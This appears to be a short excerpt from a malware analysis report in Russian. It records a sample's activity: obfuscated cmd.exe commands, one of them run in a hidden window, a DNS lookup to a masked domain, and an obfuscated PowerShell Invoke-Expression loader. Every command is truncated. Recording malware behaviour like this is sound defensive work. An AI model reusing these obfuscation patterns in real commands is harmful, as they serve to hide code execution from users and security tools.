Техническая информация
- '<SYSTEM32>\cmd.exe' hlKBuiOQmA ivptumEKjOEOSlpGWnDaRG RWInctfidiRsFs & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %ZCMwOSuGZjAQPSV%=MhFMIwLS&&set %iYovoMwkzqO%=p&&set %ZjDatiPoZwL%...
- DNS ASK fq####w4d1qw8.com
- '<SYSTEM32>\cmd.exe' hlKBuiOQmA ivptumEKjOEOSlpGWnDaRG RWInctfidiRsFs & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %ZCMwOSuGZjAQPSV%=MhFMIwLS&&set %iYovoMwkzqO%=p&&set %ZjDatiPoZwL%...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "& ((VArIAbLE '*mdR*').NAME[3,11,2]-JOIn'')( (('iNVoke-eXPrESsiON((Cu4x4v'+'nCu4+Cu4saCu4+Cu4daC'+'u4+Cu4sd =Cu4+Cu4 Cu4+Cu4&(c7ync7Cu4+Cu4yCu4+Cu4+c7yCu4+Cu4ec7y+cCu4+Cu47Cu4+Cu4ywC'+'u4+Cu4-o...